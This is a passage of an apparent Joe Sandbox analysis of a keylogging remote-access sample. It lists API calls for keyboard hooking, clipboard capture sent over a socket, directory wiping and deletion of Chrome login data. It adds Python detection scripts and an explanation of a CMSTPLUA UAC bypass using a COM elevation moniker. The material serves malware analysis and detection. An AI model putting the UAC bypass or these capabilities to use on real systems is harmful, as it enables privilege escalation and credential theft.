• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: 8[G
• API String ID: 1888522110-1691237782
• Opcode ID: 3e4cd20e139c82d1a9a354c0cd804b45f3e7cb2135d7d20bc0d0fffe1111d1b9
• Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
• Opcode Fuzzy Hash: 3e4cd20e139c82d1a9a354c0cd804b45f3e7cb2135d7d20bc0d0fffe1111d1b9
• Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
APIs
• _wcslen.LIBCMT ref: 00406788
• CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
• Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
• Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
• Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
• Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
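The function above is the UAC bypass the report flags as "Contains functionality to bypass UAC (CMSTPLUA)": it measures a string with _wcslen and passes it to CoGetObject, and the string table shows what that string is built from, the COM elevation moniker prefix Elevation:Administrator!new: followed by the CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7} (CMSTPLUA). Asking COM to instantiate that auto-elevated object from a medium-integrity process yields an elevated ICMLuaUtil interface without a consent prompt on default UAC settings. The [+]/[-] and ucmAllocateElevatedObject strings are UACMe-style debug output left in the build. The following Python is an added example, not Joe Sandbox code, that scans a memory dump for those artifacts in both ASCII and UTF-16LE (CoGetObject takes a wide string, so the assembled moniker lives in memory as UTF-16LE) and recovers the complete moniker; the SAMPLE_DUMP buffer is constructed for the example and is not taken from the real dump.

```python
"""Scan a memory dump for the COM elevation artifacts seen in the
CoGetObject function above. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass

ELEVATION_MONIKER = "Elevation:Administrator!new:"
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
# Debug strings present in the dumped function (UACMe-style naming).
DEBUG_STRINGS = (
    "ucmAllocateElevatedObject",
    "[+] CoGetObject SUCCESS",
    "[-] CoGetObject FAILURE",
)


@dataclass(frozen=True)
class Hit:
    offset: int
    encoding: str   # "ascii" or "utf-16le"
    text: str


def _patterns():
    # CoGetObject takes a wide string, so the moniker is most likely
    # UTF-16LE in memory; the debug strings may be in either encoding.
    for s in (ELEVATION_MONIKER, CMSTPLUA_CLSID, *DEBUG_STRINGS):
        yield s, "ascii", re.escape(s.encode("ascii"))
        yield s, "utf-16le", re.escape(s.encode("utf-16le"))


def scan(buf: bytes) -> list:
    """Every occurrence of a known artifact, sorted by offset."""
    hits = [Hit(m.start(), enc, text)
            for text, enc, pat in _patterns()
            for m in re.finditer(pat, buf)]
    return sorted(hits, key=lambda h: (h.offset, h.encoding))


def wide_string_at(buf: bytes, off: int) -> str:
    """Read a NUL-terminated UTF-16LE string starting at `off`."""
    end = off
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16le", errors="replace")


def elevation_monikers(buf: bytes) -> list:
    """Complete monikers (prefix + CLSID) as they would be handed to CoGetObject."""
    return [wide_string_at(buf, h.offset)
            for h in scan(buf)
            if h.text == ELEVATION_MONIKER and h.encoding == "utf-16le"]


def targets_cmstplua(buf: bytes) -> bool:
    """True when an elevation moniker names the CMSTPLUA CLSID."""
    return any(m.endswith(CMSTPLUA_CLSID) for m in elevation_monikers(buf))


# Constructed stand-in for the dumped region (not taken from the real dump):
# padding, an ASCII debug string, the wide moniker, then another debug string.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"[+] ucmAllocateElevatedObject\x00"
    + b"\x90" * 8
    + (ELEVATION_MONIKER + CMSTPLUA_CLSID).encode("utf-16le") + b"\x00\x00"
    + b"\xcc" * 8
    + b"[-] CoGetObject FAILURE\x00"
)

if __name__ == "__main__":
    for h in scan(SAMPLE_DUMP):
        print(f"{h.offset:#06x} {h.encoding:<8} {h.text}")
    print("CMSTPLUA elevation moniker present:", targets_cmstplua(SAMPLE_DUMP))
```

Run it against a raw process memory dump (for instance the .sdmp region named under Memory Dump Source) by reading the file as bytes and calling scan() and targets_cmstplua(); a hit on the assembled wide moniker is stronger evidence than the CLSID alone, since the CLSID string also appears in legitimate cmstplua registrations.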
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
• GetLastError.KERNEL32 ref: 00419935
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: aa171504a469903125c5aced0f136fa6d8287bc29fc722de82985c10da00967e
• Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
• Opcode Fuzzy Hash: aa171504a469903125c5aced0f136fa6d8287bc29fc722de82985c10da00967e
• Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
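Three of the function summaries above are capability evidence on their own: the clipboard function (OpenClipboard, GetClipboardData with format 0xD = CF_UNICODETEXT, GlobalLock, and a subcall into WS2_32!send), the keylogger translation routine (GetForegroundWindow, GetKeyboardState, ToUnicodeEx), and the service enumeration (OpenSCManagerA with dwDesiredAccess 0x4 = SC_MANAGER_ENUMERATE_SERVICE, then EnumServicesStatusW with dwServiceType 0x3B and dwServiceState 0x3 = SERVICE_STATE_ALL, called twice around a GetLastError because the first call only sizes the buffer). The following Python is an added example, not Joe Sandbox's signature engine, of how a sandbox-style signature turns such an API trace into named capabilities and decodes the constants. The TRACE list is constructed from the calls listed in those three summaries, with the report's hex literals as integers; the ordering across functions is an assumption for the example.

```python
"""Capability classification from an API call trace, in the spirit of a
sandbox signature. Added example, not Joe Sandbox's signature engine."""
from collections import namedtuple

Call = namedtuple("Call", "api args")

# Constructed from the calls listed in the function summaries above
# (hex literals from the report as ints); cross-function order is assumed.
TRACE = [
    Call("GetForegroundWindow", ()),
    Call("GetWindowThreadProcessId", (0,)),
    Call("GetKeyboardLayout", (0,)),
    Call("GetKeyState", (0x10,)),                  # VK_SHIFT
    Call("GetKeyboardState", ()),
    Call("ToUnicodeEx", ()),
    Call("OpenClipboard", ()),
    Call("GetClipboardData", (0x0D,)),             # CF_UNICODETEXT
    Call("GlobalLock", (0,)),
    Call("GlobalUnlock", (0,)),
    Call("CloseClipboard", ()),
    Call("send", (0x2C8, 0, 0, 0)),                # WS2_32!send, socket 0x2C8
    Call("OpenSCManagerA", (0, 0, 0x4)),           # dwDesiredAccess
    Call("EnumServicesStatusW", (0, 0x3B, 0x3)),   # dwServiceType, dwServiceState
    Call("GetLastError", ()),                      # sizing pass returned ERROR_MORE_DATA
    Call("EnumServicesStatusW", (0, 0x3B, 0x3)),
]

CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
SCM_ACCESS = {0x1: "SC_MANAGER_CONNECT", 0x2: "SC_MANAGER_CREATE_SERVICE",
              0x4: "SC_MANAGER_ENUMERATE_SERVICE"}
SERVICE_TYPES = {0x1: "SERVICE_KERNEL_DRIVER", 0x2: "SERVICE_FILE_SYSTEM_DRIVER",
                 0x8: "SERVICE_RECOGNIZER_DRIVER", 0x10: "SERVICE_WIN32_OWN_PROCESS",
                 0x20: "SERVICE_WIN32_SHARE_PROCESS"}
SERVICE_STATES = {0x1: "SERVICE_ACTIVE", 0x2: "SERVICE_INACTIVE", 0x3: "SERVICE_STATE_ALL"}


def in_order(trace, apis):
    """True if the APIs occur in the trace in this order (gaps allowed)."""
    it = iter(trace)
    return all(any(c.api == name for c in it) for name in apis)


def flag_names(value, table):
    """Names of the bit flags from `table` that are set in `value`."""
    return [name for bit, name in table.items() if value & bit]


def classify(trace):
    """Map capability name -> evidence string for each pattern present."""
    caps = {}
    if in_order(trace, ["GetForegroundWindow", "GetKeyboardState", "ToUnicodeEx"]):
        caps["keylogger"] = ("foreground window + keyboard state fed to ToUnicodeEx "
                             "(virtual-key to character translation)")
    if in_order(trace, ["OpenClipboard", "GetClipboardData", "GlobalLock"]):
        fmts = sorted({CLIPBOARD_FORMATS.get(c.args[0], hex(c.args[0]))
                       for c in trace if c.api == "GetClipboardData"})
        caps["clipboard_capture"] = "reads " + ", ".join(fmts)
        if in_order(trace, ["GetClipboardData", "send"]):
            caps["clipboard_exfil"] = "clipboard read is followed by WS2_32!send"
    scm = next((c for c in trace if c.api == "OpenSCManagerA"), None)
    enum = next((c for c in trace if c.api == "EnumServicesStatusW"), None)
    if scm and enum:
        caps["service_enum"] = (
            f"SCM access {'|'.join(flag_names(scm.args[2], SCM_ACCESS))}; "
            f"types {'|'.join(flag_names(enum.args[1], SERVICE_TYPES))}; "
            f"state {SERVICE_STATES.get(enum.args[2], hex(enum.args[2]))}")
    return caps


if __name__ == "__main__":
    for name, evidence in classify(TRACE).items():
        print(f"{name:<18} {evidence}")
```

The in_order check is deliberately a subsequence match rather than an adjacency match: real traces interleave other calls between the ones that matter, and the clipboard-to-send link in the report itself crosses a function boundary (the send is in subcall 00404468).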
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
• IsValidCodePage.KERNEL32(00000000), ref: 0045151E
• IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
• GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
• GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID: <D$<D$<D
                                                                                                                                                                                                                                  • API String ID: 745075371-3495170934
                                                                                                                                                                                                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                  • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error $`Wu
• API String ID: 3219506041-303027793
• Opcode ID: 25a0a320df1ddd4a05f1bf56172276946895212d30ef73ac9bcc580e9fe83ffd
• Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
• Opcode Fuzzy Hash: 25a0a320df1ddd4a05f1bf56172276946895212d30ef73ac9bcc580e9fe83ffd
• Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
• GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
• Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
• Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
• Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$Find$CreateFirstNext
• String ID: @CG$XCG$`HG$`HG$>G
• API String ID: 341183262-3780268858
• Opcode ID: e25210a9d7b7e82b6a9b82c31aad92ae6b60801589120e6a5d82eb0f0d8b2074
• Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
• Opcode Fuzzy Hash: e25210a9d7b7e82b6a9b82c31aad92ae6b60801589120e6a5d82eb0f0d8b2074
• Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413026
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
• GetProcAddress.KERNEL32(00000000), ref: 004131F4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
• Opcode ID: 616d211cfd713e5ab2c6ae92bfb1af761b1a64123242e1c70261f538c41569eb
• Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
• Opcode Fuzzy Hash: 616d211cfd713e5ab2c6ae92bfb1af761b1a64123242e1c70261f538c41569eb
• Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
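The function blocks in this listing are read by pattern rather than one call at a time: SetWindowsHookExA with idHook 0000000D (WH_KEYBOARD_LL) next to the "Keylogger initialization failure" string is a low-level keyboard hook; FindFirstFileW/FindNextFileW with SetFileAttributesW(…, 00000080) (FILE_ATTRIBUTE_NORMAL, which strips read-only before the delete), DeleteFileW and RemoveDirectoryW is a recursive directory wipe; LoadLibraryA("Shlwapi.dll") followed by GetProcAddress with "SHDeleteKeyW" on the stack resolves a registry-key deletion routine at runtime so it never appears in the import table; and the DeleteFileA call in the next block targets Chrome's "Login Data" credential store. The following is an added example, not code from the sandbox report or from Joe Sandbox, that parses rows in this listing format and applies those rules. The tag names, the rule thresholds and the block labels are the example's own; the sample rows are copied from this page, trimmed to the calls the rules need.

```python
"""Map Joe Sandbox "APIs" listing rows to behaviour tags.

Added example, not code from the sandbox report or from Joe Sandbox: parses the
per-function API rows shown on this page and applies pattern rules to them.
"""
import re
from dataclasses import dataclass

# One row: "• [Part of subcall function XXXX: ]Name.MODULE(args), ref: ADDR"
ROW_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]+")  # how the sandbox prints numeric stack arguments

WH_KEYBOARD, WH_KEYBOARD_LL = 0x02, 0x0D  # WinUser.h hook ids
FILE_ATTRIBUTE_NORMAL = 0x80              # strips read-only/hidden/system before a delete

# Rows copied from the function blocks on this page (trimmed); the labels are ours.
SAMPLE_BLOCKS = {
    "keyboard hook": r"""
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
• Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
""",
    "directory wipe": r"""
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
""",
    "registry key deletion": r"""
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
• GetProcAddress.KERNEL32(00000000), ref: 004131F4
""",
    "chrome logins": r"""
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
""",
}

@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int

    def int_arg(self, i):
        """Argument i as an int, or None when it is '?', a string, or absent."""
        return int(self.args[i], 16) if i < len(self.args) and HEX_RE.fullmatch(self.args[i]) else None

    def str_args(self):
        """Arguments the sandbox resolved to strings rather than numbers."""
        return [a for a in self.args if a != "?" and not HEX_RE.fullmatch(a)]

def parse_listing(text):
    """Parse one function's rows; rows that are not API calls are skipped."""
    calls = []
    for m in filter(None, map(ROW_RE.match, text.strip().splitlines())):
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
    return calls

def tag_behaviours(calls):
    """Return sorted behaviour tags for one function's call sequence."""
    names = {c.name for c in calls}
    deletes = names & {"DeleteFileA", "DeleteFileW"}
    tags = set()
    for c in calls:
        if c.name.startswith("SetWindowsHookEx") and c.int_arg(0) in (WH_KEYBOARD, WH_KEYBOARD_LL):
            tags.add("keylogger:" + ("WH_KEYBOARD_LL" if c.int_arg(0) == WH_KEYBOARD_LL else "WH_KEYBOARD"))
        if c.name.startswith("DeleteFile") and any(a.endswith("Login Data") for a in c.str_args()):
            tags.add("browser-creds:delete-chrome-login-data")
        if c.name.startswith("SetFileAttributes") and c.int_arg(1) == FILE_ATTRIBUTE_NORMAL and deletes:
            tags.add("fs:clear-attributes-before-delete")
    if (names & {"FindFirstFileA", "FindFirstFileW"} and names & {"FindNextFileA", "FindNextFileW"}
            and deletes and names & {"RemoveDirectoryA", "RemoveDirectoryW"}):
        tags.add("fs:recursive-directory-wipe")
    # LoadLibrary + GetProcAddress with a visible export name: that import is absent from the PE import table.
    if "GetProcAddress" in names and names & {"LoadLibraryA", "LoadLibraryW"}:
        strings = [s for c in calls if c.name.startswith(("LoadLibrary", "GetProcAddress")) for s in c.str_args()]
        dlls = [s for s in strings if s.lower().endswith(".dll")] or ["?"]
        for proc in (s for s in strings if not s.lower().endswith(".dll")):
            tags.add("dynamic-import:%s!%s" % (dlls[0], proc))
    return sorted(tags)

def analyze_report(blocks):
    """Label -> tags for every function block of a report."""
    return {label: tag_behaviours(parse_listing(text)) for label, text in blocks.items()}

if __name__ == "__main__":
    for label, tags in analyze_report(SAMPLE_BLOCKS).items():
        print("%-22s %s" % (label, ", ".join(tags) or "-"))
```

The rules deliberately key on the numeric hook id and attribute value rather than on function names alone: a SetWindowsHookEx call with a WH_MOUSE or WH_GETMESSAGE id is not a keylogger, and a SetFileAttributes call that sets FILE_ATTRIBUTE_HIDDEN means something different from one that clears everything before a delete. Subcall rows are folded into the parent function because the sandbox lists them in the parent's block; if you want them attributed to the callee instead, split on the "Part of subcall function" prefix before parsing.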
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
Strings
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
• [Chrome StoredLogins not found], xrefs: 0040B27B
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
• UserProfile, xrefs: 0040B227
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                                                                                                                                                  • Opcode ID: bdddc7e9eb557f5a320f3d6e825e671367b569a08c7a941355f568ef02c6412d
                                                                                                                                                                                                                                  • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdddc7e9eb557f5a320f3d6e825e671367b569a08c7a941355f568ef02c6412d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
• OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
• GetLastError.KERNEL32 ref: 00416B02
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
• Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
• Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
• Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
APIs
• __EH_prolog.LIBCMT ref: 004089AE
  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,00F5D160,00000010), ref: 004042A5
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
• FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000288,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(00000288,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
